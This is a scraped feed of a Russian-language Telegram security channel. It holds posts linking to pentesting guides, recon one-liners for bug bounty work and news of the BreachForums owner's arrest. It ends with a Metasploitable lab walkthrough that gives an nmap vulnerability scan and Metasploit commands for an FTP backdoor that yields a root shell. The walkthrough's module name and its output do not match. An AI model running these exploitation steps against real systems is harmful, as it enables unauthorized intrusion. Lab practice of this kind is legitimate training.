Fsecurity | HH
2.06K subscribers
1.73K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Forwarded from Social Engineering
🔎 Автоматическое сканирование сайта с помощью Google Dorks.

🖖🏻 Приветствую тебя user_name.

• Тесты на проникновение обычно требуют набора специальных утилит, но одна из них доступна каждому и всегда под рукой — это Google. Нужно только знать, как им воспользоваться.

• Однако, что если процесс поиска данных через дорки автоматизировать? Наша продуктивность может возрасти, шансы найти нужную информацию увеличатся и, самое главное, мы сохраним драгоценное время!

• В этом нам поможет #OSINT проект, который в автоматическом режиме позволяет найти на веб-сайте популярные админ-панели, уязвимые страницы, распространенные типы файлов и многое другое: https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan

• Демонстрация инструмента доступна на сайте автора: https://www.ivanglinkin.com/fast-google-dorks-scan/

S.E. ▪️ S.E.Relax ▪️ infosec.work
👍1
Forwarded from Social Engineering
🔖 Коллекция полезных Mindmap для хакеров и пентестеров.

🖖🏻 Приветствую тебя user_name.

• Для начала, хотелось бы напомнить о самой крупной и актуальной Mindmap по пентесту #AD на сегодняшний день. Можно подчеркнуть для себя множество полезной информации и использовать как #CheatSheet: https://orange-cyberdefense.github.io

• Теперь перейдем к основной части поста — коллекции #Mindmap. Подборка включает в себя карты по самым полярным инструментам хакеров и пентестеров. Переходите в нужную категорию и используйте в работе, крайне полезная информация:

- Burp Suite;
- Empire;
- Impacket;
- Metasploit;
- Mimikatz;
- Nmap;
- Privacy Tools;
- Serach Engine for Pentester;
- Sqlmap;
- wpscan.

• Следите за обновлениями. В будущем будет добавлен новый материал: https://github.com/Ignitetechnologies/Mindmap

S.E. ▪️ S.E.Relax ▪️ infosec.work
😈 SQL - инъекции, тренируемся на DVWA.

В этой статье рассмотрим уязвимость по средством SQL - инъекции, увидим насколько просто можно достать информацию из БД.

https://telegra.ph/SQL---inekcii-treniruemsya-na-DVWA-02-11

#guide | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Kali Linux
🖥 Вспомнить все: 6 уникальных, но подзабытых утилит Linux

Приготовьтесь к путешествию в “кроличью нору” бинарных файлов Linux. Мы заглянем в самые потаенные уголки /usr/bin и исследуем уникальные и интересные программы, смахнув с них пыль времен как с затерянных драгоценных камней.

На первый взгляд они могут показаться устаревшими, однако это не так. Они все еще представляют собой весьма полезный инструмент для программиста.

Откроем же для себя еще больше удивительных утилит, которые таит Linux.

Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Хотел бы узнать ваше мнение 👾
Идея ролика: Beef-xss как могут взломать через ссылку
Anonymous Poll
86%
Нормальная
9%
Такое
5%
Не очень
😈 Netcat для пентестера

Сегодня в этой статье мы рассмотрим одну из наиболее часто используемых сетевых утилит и узнаем, как другие фреймворки используют Netcat для создания сеанса.

https://telegra.ph/Netcat-dlya-pentestera-03-01

#netcat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Kali Linux
👣 Zmap-ProxyScanner - быстрый способ поиска прокси. Поможет найти 2000-5000 рабочих http, socks4, socks5 прокси за одно сканирование.

⚙️ GitHub

#github #soft #Go

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from PAINtest
Последние три дня багхантил и собрал несколько полезных однострочников для рекона и поиска базовых уязвимостей.

Для поиска поддоменов:
curl -s "https://crt.sh/?q=*DOMAIN*&output=json" | jq -r '.[].common_name' | sed 's/\*//g' | sort -u

Извлекаем все URL-ы из APK-файла:
apktool d base.apk -o baseAPK -f; grep -Phro "(https?://)[\w\,-/]+[\"\']" baseAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl" 

Проверка корректности CORS:
curl -s -I -H "Origin: yourdomain.com" -H "Access-Control-Request-Method: GET" -H "Access-Control-Request-Headers: X-Requested-With" -X OPTIONS https://example.com

А затем обнаружил, что существует репозиторий, содержащий не один десяток подобных полезных скриптов, пользуйтесь на здоровье :)

https://github.com/dwisiswant0/awesome-oneliner-bugbounty

#bugbounty #bugbountytips #recon #tools
🤔1
😈 Обход WAF для выполнения продвинутой SQL инъекции на основе ошибок

Полный дамп базы данных и получения данных пользователей с помощью Error Based SQL и обхода защиты веб приложения.

https://telegra.ph/Obhod-WAF-dlya-vypolneniya-prodvinutoj-SQL-inekcii-na-osnove-oshibok-03-12

#Web #SQL | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
log4shell.gif
5.1 KB
😈 Log4shell в Google

В статье представлен поиск однажды нашумевшей уязвимости Log4shell на одном из сервисов Google.

https://telegra.ph/Log4shell-v-Google-03-14

#Web #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
😈 SQLmap: пентест БД

В статье представлен полный гайд по тестированию на проникновение базы данных с помощью инструмента sqlmap.

https://telegra.ph/Testirovanie-na-proniknovenie-v-bazu-dannyh-s-ispolzovaniem-SQLmap-03-16

#Web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В США арестовали владельца популярного киберпреступного портала BreachForums

Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.

По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.

16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.

Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.

Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.

Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Forwarded from Kali Linux
⚜️ Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

💣Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)


И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
😈 Hakrawler - быстрый CLI веб-сканер для хакеров

В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.

https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21

#Web #CLI